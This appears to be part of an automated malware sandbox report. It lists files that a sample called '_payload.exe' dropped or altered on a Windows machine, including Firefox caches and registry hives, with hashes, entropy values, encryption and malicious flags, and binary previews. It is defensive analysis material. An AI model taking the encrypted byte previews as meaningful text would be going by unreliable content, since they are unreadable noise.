                                                                                                      Preview:'use ..kl.......`.`.w...:..:&-s(3..=.U.D1....0.-.d...eg..vK.2...u...x.L.....d...be_.%w.......8.%...7#.....~X.M...<...EWEy...q..[j"\.j.S.:..(.<....G....;....^h;Wt..1Vq`...I.k.w....bX(7...8.........(....ofd.y..D.5W.@diJ.1!..k..1........Z6..y&.*.A....i....~U..6.u....&../\I..G...U....'..........#)!pP.rw\_....GM.....2?k..I.........~....~......^.r.,....`.!Ys.0=t.[...<..z}9...E.+5l...%L.{.s..w..vW...`\...I.n.7...+D........@...' ...'Db......l......Y.lV-.+.....5Z.....t....f.r...#.....9g..(;.UM.,V.x.2..?..wY.|...QO.zi{Z..J.+s?.E.....$3$I.g...I.KI-~..1.I~.v{...A.m.._S7..0-.{.4.^....)..2...'QdD.x..w...@].4{q..l............o..k.7.m..tM...$^..-.p{.|.+.....L.@$.![..J.RbF4#..]l....I..(H.....4..<.s...o.0..u..@.....UN..W.Q.s..6_....A.OO..G.Yo....u+.)....V?:.\j..s...#.....i....0..(....A/VW`..#;...j.X5...3.....w........R.vc..W@..j.n......d.Fg....z~..Ey......Z\..50..pL...oc_.-"....I.$,..=.~...<.L....j.x.(.....y...kR....o*._.U.r.1.R[ZN>..Vz....g..L-2...O".

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Safety\shell\remote\script_96032244749497702726114603847611723578.rel.v2

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):31496
                                                                                                      Entropy (8bit):7.994909754091372
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:768:+HMS6hlTU4KqLM1U87wALGcVlrlsMdMTq:46hlThKqLMNMcV9lsM+u
                                                                                                      MD5:1410FB728DECAE27B12BE5070A43D5EE
                                                                                                      SHA1:DCC88FD168292913381FD28D839AEF058B162FD5
                                                                                                      SHA-256:E63F8919098EB6C2F415E98CE29752828B3BD2A55D125CEE35DE4D9BF061A067
                                                                                                      SHA-512:5BAE121C8290F380E61DAF3A84FD05A0531428BD8B527A380B0778BFA34FF93392BB68018A2A6782EF2B9BA5ABD5CF91E887D7C861D9A8DB73B903C7F13A8646
                                                                                                      Malicious:true
                                                                                                      Preview:'use ..f7q.F.:....8......7K.y2...*.....z..]....e......s+.D&W..!.SML+.*.......Y.?JlP._iG.q...|..L.Ls2Bz.r2..].N.u.JZ.. ...w@^.cg.3..M...'.v. .|.).s.E.T<.F...5R.<1...f..y.'9KA9.NOB..@...[.:(:.....N)....[...F.;...}.[}m...}...r...d........5.i3....O.q......k........Y..m4Q...t,I..i.I%.._..=dp.W.T....@=>....s..L..Cn{D.};4.._|. Y@vD....c.D....&h...>...P=..k..}Q.AF....^.x<y$8.6Y).Hi..k(_R(......Y.....d:.Y...h.H&...=.......X.iX[.M.....k2.#.."....@.y..v~.(.7..x.U....V......W.w.s....bT.4......5Ak..7.!vk...B.5.....E. q..0....W...:.........e.o]..O.yn.a......H.\....~[x*.......0{...y..@.P...........].......)R..X....m.M...`-....Y..}....p.$.^K(.h...8..3.TyR.8qP.E...>....".....2Q...A...m.X........I.".....W....#l-...).k.lg...Y.._.<C...".S.8......k`....5&.3..6..a^9..5\.ye..c.5JF*i.S..C.)..7 NP...-...z.....%Z.Ks..9...R.N.....Y..R/.&.Y.Wg& ...g....w..\.{.Z...a..0...u.rR.e.Tf>-..U.e.8Y2: ..BY.I&c.....u.LL..M.t.3s.|.i...d.O!~.....r..h..~Y....m..TS

                                                                                                      C:\Users\user\AppData\Local\Microsoft\input\en-GB\userdict_v1.0809.dat

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):20346
                                                                                                      Entropy (8bit):7.9911319056355845
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:384:1juKD3BRsjmOiOf8PBj+LyIUb4ZVh5VA9uZy+uqYcJGgfInt8C2/FLWRCV:IwTI8uym5ZNAgfQt8tCRCV
                                                                                                      MD5:3CBFC06CEAA8710D197F0CB6DC44AB01
                                                                                                      SHA1:8E2CBB15D8DE6EC63DC0D5DA8E245A8052CF319F
                                                                                                      SHA-256:CEC224C40EBA9B748F9DD4DB76ECDF3823B27CA388A75F2AB8A64EB954B53072
                                                                                                      SHA-512:57129C0811BDE3FDE99AA8A677BFB7219978CF566B9FDBC63075F5338231039553F7550D773838ACBBE670F6DDA520D480992684FF44140DB1DCA55124EC17A1
                                                                                                      Malicious:true
                                                                                                      Preview:.......,.=q._...!.,......S......r.s.*.ru#...nd......Z....ga..|.)R.'l?.@.>>O.+.9...!n..........t|.....9y...XN.x..v-..n2K.X...'.t........F..._.2l.B.u...B..M...m.a:.....A:.. T....M.e.5I..@3}.k[.q.bs{>..O..l.L.:..-..../..qN..;....(qw.\V.{w....../m....#.t....h.g.;...\...}..#..>......+`'....K.T0fT3.M..*...|k.q.J.]r?.&...{_..5......IO.M5...Y...n.Y~W.&[(.g!.O...v<...[..*.g.;{.l..}..[.m.H.d..w.......P....K......P+.I......f...}..~.+..|.......Cx.z...^...g. ......$...?8.k.Y....6AG........pw......f.K..e...u...p,i3w............&..k.EJ...''....T....+...6.eY)..fH....)`D..>.qu....I.....z..3.....R.U..N.....G.......z....7p.n.3...E....q+G.Q...Y./9_*UF..ECI.P!R.'......o..Y..R..0....6..u.w.....;O....Y..|..[....H.o..C..!.a..R...s?...........v...."V3S.MK..b}..?.%..cj......E"....,..E......hf?..1.3.,..9.........NU....?..a*..jHX.g.&.....O.R..dwf>.i.nA....?ZG..kZ....V$.fi.:..(...d..TY...o.([.;./..;.6.B..@:..r...$...I..`G*..QBl..#..pJ..#.....|.H.I....1/....&$..U..j.

                                                                                                      C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\activity-stream.discovery_stream.json

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1583
                                                                                                      Entropy (8bit):7.85607347740729
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:Y5rNXwyZEk9Sqxw8kL5op1qHrf256B1wD:2rDEkNnkL54qLO5wW
                                                                                                      MD5:B62D919FF9B827FF79EE13A95A4CC2DE
                                                                                                      SHA1:4465E45316BAD8AE0FA0A8DEF50355E2F7ABF02E
                                                                                                      SHA-256:266A157031B08F672ABC28BD89F83D2DF8EAFDADE744F4A53541E485177A92F6
                                                                                                      SHA-512:7DDEA492B837CAD4AA6344F3924C345619AADB17F0590236796B4AFA6FB40C50F20AC9F19220893DFDF2CD2D5681DFE48BDDBB3CCAFB82918A991022B33BEC3E
                                                                                                      Malicious:false
                                                                                                      Preview:{"spo/?...I\.9./...c7Cj........=.u"..W`.v....@.Q....;.O..rA..m...8.k..p....;..r..."..V.%...9*...^.)Q.-.k.j..).h.j........7...V>....+...P.$.........O....G..+x..yH.KJ.Y.Y=....-....>..<9....[...:.z.T.Dya...cm.E....2...C..a.2..mEzF<..$......o./4{#..v#A.&...0.......;.q.T....ac...e.(...Y..T......+.omL.,.,.9.V.....wi3..%.].y..M.)]Ah.......!N.u..rb..PK..+.N:.....h..h.u,.$...`....|..JuP_y..TB.p..i..n........c......L!?..e....l......~"c...sx .{..I.......r5.g..5..Xivd-W..%.l.1......$..v....x.\..,5...B...^g..r.....M..... o.. ...Z...1Z.)/.0.*p........Q.;g3......q....1.yN...}B.r&.._P.?Qd8......7.-..bUD.`J....f/,....".]..b#..*..Z..v.I.m.5=..D.3.d.!..........[..k.Hzk..t...*.7Q....._.AV..@+..:%.;...7.U l.f]Vd...Q...Z..QP..C\'YR...6#4.q..5...}eB..:.lT....M....)......^...?j........s.$l.....w.pr.(....E.......].ECu..ln..._..O8I0.d/.T|..+}.....}!.?F<.$.p......D.g.....J..Y&n.!.....^..M..]..b0.E.A...'+zb.*.qFi'o-f.....K...M.vdu..'/..x,g.....2.&.N..........

                                                                                                      C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:modified
                                                                                                      Size (bytes):7915
                                                                                                      Entropy (8bit):7.976736351747881
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:fJpE5Z/q3fjkTELct3iAD1G+UuaTcP5+9QG2Pvg7bQ2aydK:fJpE3y3rkAAZ7Uuas+9pAQsydK
                                                                                                      MD5:8272544AABF54ACD27A58EC08EB5A384
                                                                                                      SHA1:AF1EE2B86B2239C087AF753F6A97CF752F30CC33
                                                                                                      SHA-256:2B3E162B76117847EC79A4E2330C5EE36778730CC334B6864C5F17FD840C96A0
                                                                                                      SHA-512:87E93A35ABB902CF11840C234F42EBB5EA3377E622A09070C6D0070D0A2DCEA6AE4C260C4EC231AC404FAF2C07C0F5B20B8D5945762FCF3E45805D52A009EB5C
                                                                                                      Malicious:false
                                                                                                      Preview:# Thi....a.......{.'9..9N~.:..'....L{w..}...9.}b7N.OkB..`..B...S._..S.(.....t.^....>.A........#k....g..#.....O.[...]&U..4.f.5...P.i...C2.cA~~..._t...1<R.<......y...X.e1..-. /._...h|9.v..L|8.O.r|..2L.>$[.'..0...]..........;....Ll.....A..y...?.L.c%.$.]...../|.._./...%K.p.5.\..s......Q...H.9...cbM%.+.H.(Kj...6T....x..T.W/...U..Z.<.7.F?.....a}.n.x`D..2(..T)..^.(g..[..6C.....#.?.4......1\.........K.....D...]\.^=E.2....A(4......5w7..V..'..y...M...h..ZjEu......y.p.473...-.......7..gM.1 ...ZP.".....7o.I \Ry.u..3..(S.6.ByU.I.T.8..q.p.E.92.....K.Ox...[..U.....ur...\.<.....GU..>.X,w.K9/...*.....;.z:.W_!..K..\y..C.... .8..iwN.d.S~..T......n...W..FmU......!V.N.4l...z.cvN..hv.y.....k~C.ZS%.{....S=..b=./.ki.q:Cg.BG.t..i\.t.|...5...y...j.Q.Y.x...Z.@...4..d.I...R...)5..A.9..{.}.V.A.%B;r..-.{H_.v...^..tEE=.......P@.>/......l.qv%..M.a........'W~.T.0.1...I.eR[M..r<..J..U/K.;....?wm..>..'..(.....C.\{xg).!.....4..........0..4....w....8Wd..Q)..J+?...b.k..6T

                                                                                                      C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache\scriptCache-child-current.bin

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2046434
                                                                                                      Entropy (8bit):5.076308148200626
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:Ot0vnsfFyC4xqcGG487l/bpO7oypPA1OEiCIuRhRuPoCnE2ZzNYLQhhWiqAg+Xdu:OusRcGGR7l/bqs6BjUNR+s
                                                                                                      MD5:32F949808601CFACC2D527ADBFF9D1E1
                                                                                                      SHA1:4F9968B5B5FCDD843F0F3C790C3869CE507277A6
                                                                                                      SHA-256:A739DEA42CEB08BEE7F792398DD5A916459DD1EBC61E94BC8A25BF3F88D10971
                                                                                                      SHA-512:31DE173C23605B523D5C1BAA0A80671790179346F30B54AD361A2A900E14F93FB85B74BADC294DA6F172152AAA3DF577C1CB7FF82253E9E194EF2F17F4EC347B
                                                                                                      Malicious:false
                                                                                                      Preview:mozXD(aKm/&|&g.C..CO1X.Z..q.-.....E..f<4]..T..M../^BV...n...SS.)|.n.d..G......7]M.e...8.#...[......VW...t.oK.-....|....A.5t.w.....s....65...T.6.@.p.;2{.....6...9..=..?.....f...d...:H.-X".b..O.i.%..A....@,.1e..~...zC....d...B.T{...y.cycE.g....5...b.....)...Y....dE...7.(V)yS{....Y;.k".Ws.....h....Q._. c.MV.1.....!...........]..{.......R.-H0m.r...:.@...w....W.40...0R......e..7z..M..+..d..&..vt_......>..R.H.....:.1l.'..%.-:=A.v0K(.....r(.MI...M.2..w....Y..w?.f,o.......v...aN...V.`S.v<~c>L .hE.K.+......@P..R..(S.O{.Nr.^p.?..OTb.mT.i....^{M..Vt;f..m.w..}..N.J;...@../n.=[L.[g.!.yLS~........#...@.9.....(c3...t....X.w.....d.m...Yvv...6Xr?..;>z}.%.......^.m...>.._....T..a5.......e|..z.|*..}($.....t[....u.=...g.~.d..H.L..[..y.,.t-....bk.drZ..T|....a.6u......%...>$D....u}rVB..U..N.*1......2..T.{...[\...Z..O;...c(.?..\..^.#O..[&XjS.5.).....O..-..p,....&.Yf..y...4.".R.M.R9T2.`.R.......2...`[....z2.G.b^6.>.G./s.. .3........'..}.{#.....p,..I.a!a.9.y.{z...G{q....

                                                                                                      C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache\scriptCache-current.bin

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8387278
                                                                                                      Entropy (8bit):4.802779170542674
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:49152:Da1wTv3Dxd4C4sWDc+ikpXGGRAuAgdyR+FwDkly0CNG1Kl/S/qyal+6N7hS5BLVy:++v8EW5IdVgdy6gn/SSyal+rPw
                                                                                                      MD5:AC13101C8E9E492847EB546750432376
                                                                                                      SHA1:73892D7CA7976B1D2EC84A4BD86B6D39606743B8
                                                                                                      SHA-256:B4B99A90B885F1405E96ED54F95F912A584760B6D29C7A044A77B6CB2052DC2C
                                                                                                      SHA-512:D57223F3DA27DA4BBB3639A3BB96A9916BC6D3C276BA80CED6BF085AF5835E5D922A40848D49B3E679FDE7E461658E2281FE406B1E72DD2B61CDDCD211034C42
                                                                                                      Malicious:false
                                                                                                      Preview:mozXD.n..nD..[.G.o.1.-..i...5.Lu.....^...|.\X..........-.l.PQ..]|...z-Q%o.../p.......k..y.....#..XSb(...~.3SI..c.Q.fG.N(.7q|.d..6..:\.....V...h.D.....V.[.M..MJ...7..Q.........e=5t...d[.h..5.NUR...+u..........j-r..o..b...-.v$..j.?...Rre.J..A.}..2!....i:z.J#.E.1w.. .8....qS.6...V..p.L..o.....).&,....6..E....@..{..x`.C@...17J.:.Z....@.6.aA.1h8......Z..^3.2_....6H...v+....:.f{A5.10.Eg.o.9..*.".e../LwhX ._.S!....*.."Y.4.......m.0x.v>D......!.T.5..6.#F.......J...;.$.^-..<P....0UK....<*......d...?.......O7......:.(F.c_.u..V...Dhn..n.|.p.M.].P.(...v.R.Ah.Y..%...@..*.5W(..uI..ae.h.Dt...2....n....)..Uvx.....v........i.p+......B.....]/.X.r..K.d......n<...(u..G......;.\.E...)..7.Q....ps...w.....^.<.E......9$.n......".SIf.2w....|.\v....c..6.;m'.....NQ....I.r*.9..VG.=o.C'..t.....s.I.....&h*x./f........).vd..y.{Q.....:m~.6.f..qg%+.p.*...d.....W..L.T...>}....ai..8.......U+...3a..,......c.......'..J.'...]...?XP..`.1.3"+..i....n...u....H.:2.....i-..l,{.8.p|.c.}.!BY\..Q9

                                                                                                      C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache\startupCache.8.little

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2620287
                                                                                                      Entropy (8bit):6.999010273505839
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24576:gaOkPPQDzXEY2M9Ooj6HoMllbQkvFLqLhjYOC5QSbs9fmadKzz/we3qR3omqfkXd:5OwYboM99IrJxEhfSI9CyYlNjcHu/EkG
                                                                                                      MD5:91C25232CEFD8C19A1008E9D8C330D2D
                                                                                                      SHA1:CE68D4B6939E77EA36886C5A24C089AECA7A2BD1
                                                                                                      SHA-256:D647F9A0695D9E4CC2A3388442AB7D74087E12EC55819DFBB90A3CF39028D778
                                                                                                      SHA-512:C61403E35291E5E70F9DB533EA80C0F57581D6BAFD92F658F689CAF23E20969FAC32B3308EF9640BB8F23DF6753593AB61C61F3F13F9D67D0350D6EFAE4DB502
                                                                                                      Malicious:false
                                                                                                      Preview:start]<.O..1 '-5...o.A.>...5.k.<V...c..%U..C...8.4Hhk..v.}$d......T6H..m....X...e.....!.p..F...K..'(..:a......\.N.#A.>..wtF..KZ.2.a.T#..%..i?......-R..O......6t..v...xy_.......kW)X..xxm>'.^.J%%D.n.Z.O.s........JI....-.......c'....q.n%...P..C.aBf...n...V.K...L".]..X....:.9qnC.....-..6..DE..#....f1HZ...Gq.i;..3....9P...%\t@..[.3..xf.i>#.....vD.S...`D.Q.l.n..p......oR.......+..=.X.Z.,.`.$.H<1...H....t7(g.^....U.<..j~&z!......u....VP....Y.#c5^;.D....q)Z<.,.*"....;..J.5.J.......%........A{.<D|..j.?. .P:..[........`...UH........b.......wRc..(..1|....8.R.....u.*M.|u.E#+Q.rD.peg.:..M.%.|w.|.IC6.c..L.C.}l0t.l...k......./tM...j".S.@:=X....T76...UN......0Z....pDLi.cv..a....j.3.efA.)(W.....%yZDLOi&...g......W...w..R.2.b.......F.*"Ih....$....e.!...m&a.8...Z./Z.._QB.-.12...!...<H....0ps..`rS|.N..f..k5....Q_...A..uPJ..T...Sf..L#...;....uU.p....5j.y.. 5......l..Yp.6.....Z...3.{.D....Y.U&.]..u.#c...l.....G...S...M...z...^.1.!....(.W.=..N...5......9

                                                                                                      C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache\urlCache-current.bin

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2983
                                                                                                      Entropy (8bit):7.936454150511282
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:5OmlXmFwLKby8dwwNk+/DFgoxyy/XMznIpE02EU1d9rPtQowyGXTEsNwD:rQOLgN//hgojcze+Z1dtPtQowysTD+
                                                                                                      MD5:6B241BA5DCD7C5812D3ACF5B189610B5
                                                                                                      SHA1:820C3A0EB100DE726D58313B95D602B38DED8602
                                                                                                      SHA-256:A012F69CCCDE700454BF835CB26CD4885D7D958D8DDC0385B7B910FFF46BD5DB
                                                                                                      SHA-512:C917658D91D59DE46397D3FD3CF51FF0C884B0BBCD50B8003CCD018D42638A4A3419C3C63AB0235BCC6A19CA9DEA1C009BF85C21C997075908EA62D3161D5038
                                                                                                      Malicious:false
                                                                                                      Preview:mozUR.i......6..~...*.C.!...k......l...X..W.............o..k...(y...Q..$.~M'-1.].#u.|.f$...,[..Sd......~=.P$.^>..F.{u../.j..@...j......f~O...P.Qe.''..>j&.;M.......h....PD0h.Y.{..+(n......t.x..1.t....XT.}.V|<.....Zn&.!D#......8Q*..w\`.L}......!.W <........).@.L..o...IM..JHH..%.c.u=.e..............+...........z..ZU..D..)........%.d..<.,.R..q Mn.@.4..&...2..8..0....u2(...|0..2t.36$."0x.w...N...4i..A...dW2.i.;.<....C..t6.21...).p`x..au%.K.Q............;4........W~..}.../)......f....F....R........Y...8.!..Xv......t.#4.f.*.2.q...76..0.I!9.. b.Ei.|.M...x.Bt>.T.y.........K.+.......{ .s..9.e.D..8....?.;...g(M..Ei.u"H.U...N..:.".7.s2W..d'......6.^.U......!]......./....G.u_1.f.<...4.....QM....c]...o._.........t.....#Y.........l...X.......+0.R.>..a.f....]m...L.(.Rj./.......#!...j..-.Q'...7*@..R......1....?.....U..V......^..O.)...{c..>.........u...1..r.]%..I..-.MY.;@.v6-.|.^...}!.q.n-9.L.......Z........"........).r....U-..[.r0w*.[2...A"..0.a.a.

                                                                                                      C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache\urlCache.bin

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3739
                                                                                                      Entropy (8bit):7.944416793782143
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:6CsVv+SPkACav3E6vNhwmA8HR2cTlU4luPCbX6:RmC23LNhdAwXTHluPCr6
                                                                                                      MD5:795550C29BADECFAD6D39106C713A5DB
                                                                                                      SHA1:187CE352FC03D929393C706BB3893CA5F4E57A86
                                                                                                      SHA-256:FA7735BFAF2ABA33E647B7882C1AF9E0AF9A4B0CD9263BC2DC97F3347A42696A
                                                                                                      SHA-512:1ACE6BBA911AD7FCA071BACE24B95CCF5695FBEACC16CA0D801106ED6A281FAB22B83E6FDD665992DE78DA62379627C45C153B5C6CCF9EC6259EB98159747AA0
                                                                                                      Malicious:false
                                                                                                      Preview:mozUR.JfJ...9./t.91.\/l.>.p*0.......S1|L.5..j...V..0jZj.\..x~F..0....uY..mI..........;f?.,..7D..&...cLd....M..J+.g..h..t.4...?...?..Q.......D.v..oU..:....@........d...S...[V]...qY...:}...P.F.....I< ...........Q.-..F.]V....9.:&..'H.?.....bP....*`.9wc.9.&X.r.Q.#..d..HAQ.U...,7..^....M.....lVRJx |D...z..Y.a.....p.....%t......].a....0....}.bryL`.9.....g.F.D.~....N.w.rW.|.>".......3...9..-..].K*F............m\.k3.....'.;..Yea....&......G..v...oV..qR=.7|..D....Tr.T4.....N`........`...k9/_.....F.R..".a.S.?7.%.$.k.......0E..-....&..~I..adC..%I.b<..3f.V.k....7.p:.%.Xe..UG.D.._.N....F.....!.Y..,)..(.......@.2.".H...@,}g...o..i .J...l.+.."q../*.Mt...!........~.-.MS1`U...</^.M....n......>f.^.... ..a.zU...*H.Vo6O...Eu........f.z.n`.|@..l...........g\.L.I..r.hV....A....$...`...5....:.bh=M...o...^..b..-VW...N..'.....n.>4MB......,.I.+Fy.lY..V$..yd..5.E...[;g.g[...L!J.N.*.8..J.F-..%/]..Z.QQ|{g]_..~...&.e..xP..~].W..v.gA@c....oU-F4...'....46GTZ.{M.....S.HUz...

                                                                                                      C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCache\webext.sc.lz4

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):110692
                                                                                                      Entropy (8bit):7.99828953962285
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:3072:d3pvEJwe+xOsqFUdh+rtNSzmp4+c9q0Jj:d3FhxOPFUdh9z2Eq8j
                                                                                                      MD5:35B2D90AD0E95B406EAC84D2FF2DB421
                                                                                                      SHA1:085426A72016FC94F35834B4B9E22F1B49BC0F4B
                                                                                                      SHA-256:BBB5B142D8205DE2AEE85F8ACD6D7A6B19E3BC11864F6B9A9B4487CF81AD42BB
                                                                                                      SHA-512:85C3E1532428673901624B259D4E03D2A8E15739747D0F311583B96A8A3E5FE039F245361B9FC949FCE8330E953A6BCFBDA090FF8859DF0ED8565DC7604D674A
                                                                                                      Malicious:true
                                                                                                      Preview:mozJS~K..0;.9Xs.M...<..J......r...5...h..B*...8.t......Sz.W1.>foA*..7...Bx...]r......f..-.......M....10.d`9....q<T.c..c.v.d...'.y..T5.....nJ....JV{.[.i.A..LW.@..za.h.lA.1X.....+.)........D........r|.F.....Q.6..=....4.{... .".*.h.....y1.Xi...Z..83.@=..!e&:.+.i...|...Nz.@....k.4.../..r..f.Zi..\U...A..A......5...._I)......Iuy".....h..G'zo.-9..7..@..{..z..n.....2..".4J..r.XVqbu..K..V.......]j..:r.....J..h..+.......H.:..J!k...1....8.B....w..L......G..N...>sq.....B.\...@\.X.'...n.....e....M......R.....K...g..zv)m.E..!&s.Q.....LHF.....E.F....shF..5.R.8."......h.nca+3J.LM....'.S..!..=...eY..%.V*..T..|....`M.U.#..Z......9]'5..D.?9.+..~PA..V..{.....-...../G.@.FG].<...&..6.\.NEv@...Fz."D...na/.G.r..F?`sbKz.H....Yu.3..9zF..5}x)b[p...*v."...V...'..al...jH........en.c>...+?R>..p../..o.'.Vx~.......C.F..)..K}W..4..;.n.M.....Z.0..2.f.........K.p.N.T.......Q.h...O...@....... B."....$c4......JO....R......mr:#..m..$.a......fx..ku,............:@"...}...

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\AC\GEH\POF.dat

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8526
                                                                                                      Entropy (8bit):7.977520187848551
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:mydFSOMnLfugchYDi+JMpQTqhizJgD7Aurz1kzXec9g26s2:NdHMnDurmM2Tqhiz6DnrzeDXr2
                                                                                                      MD5:AEB77136956D2C46DB1468EA7ED1A4E9
                                                                                                      SHA1:DF3CD89C6134C880FDAC3C3B502AC17E2C5E827B
                                                                                                      SHA-256:DB4724D732A4408CF32BDF3D96EE2B21A3081C46FCE163DFD6C8B86EBD5F13B9
                                                                                                      SHA-512:95340BBBDF01CCF1968FF62D0C07CBAB055F109D019127E3DC0587628C47B9887F48A9ED0E76BB74D7C76DE23867D5043EBE8449318FD690F3650CD25BA0F17F
                                                                                                      Malicious:false
                                                                                                      Preview:regf..J../z.;.m...'..9.].+f.oa.J..0...-e.n.._..1.g...A3.p.........@F@..r#......}>.G.RE......73.~.....-z).`.....5._..b.......j.....!...3o..1..W...;.p...OB..[.....lV.H^.t.jdo.D...mJ.*5..U....s.h..........6Q..J.;.t.&.U.m.6../D.5....M.."L.hf..g..B.......J..|.@R......R...ws.W.-h...._.\W..hO....@j.....P.I.m.t........0..d%.~....|.T.|F,..8..u?.Yj..M:...7.=..^.$Vb..#3..I...2.S/.bKQ.2z..,rS...4..,$.A.u...X=.-P.Q.fD...N.w...KE...jr$!.Gi.........c..vP..Uyq..L.m!.....86..q....\jA2...:S.ID.....u..b..n.8...)R.TP....U3y...\H).\..[....1..jq%.%.....5xt.+......_...=.1..E.|.'.tT.~k......XM|"...%i...2..X.......R>XH...C.b87.....o.;A.Ua..&a.$.n*..[37.!$...F.....3.X5..a.v.g.Hn.......0.i...([ZlO..1.........L...2..C..3..n......;UX.].}.0'..f...o......"`....KA.6a(.....H...G...*.A..q..w....t.^.)Z#Ik............8.u...b|.....D..)W8Yf .?.-|.......c...R.R.`..Cg.K~..p..Z._..m...'17..<.....;deG.4....%..5....9..{..*2x#.h.{....../M6.P.Az..vq.u.].....Y.<...m....r.

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\AC\GEH\POF.dat.LOG1

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8526
                                                                                                      Entropy (8bit):7.9799299714840375
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:5LDCGk4E8nu//sWNo3eePg7ZR587PEI7tF9innH8YyhnMY:Fpkb8nhj3ee47ZRS7Pz7tHo8YyhnL
                                                                                                      MD5:57F49957A86DFD87B9DB09C4642E8568
                                                                                                      SHA1:0177B07B7E64E2C32CC521765F86AA46ABE7D639
                                                                                                      SHA-256:6F7E2715A671CE19F006D9E6D775ECD97E95DBD581090D7CE9B536BF5EAACEFE
                                                                                                      SHA-512:1EB785BD25CB4658ED7693E43B45B783F6BF25152315E542DD27836F911284398B879A14B64722B21149892A3ABB38E7DC5345683F7E58FC5958A25DF43DB2B1
                                                                                                      Malicious:false
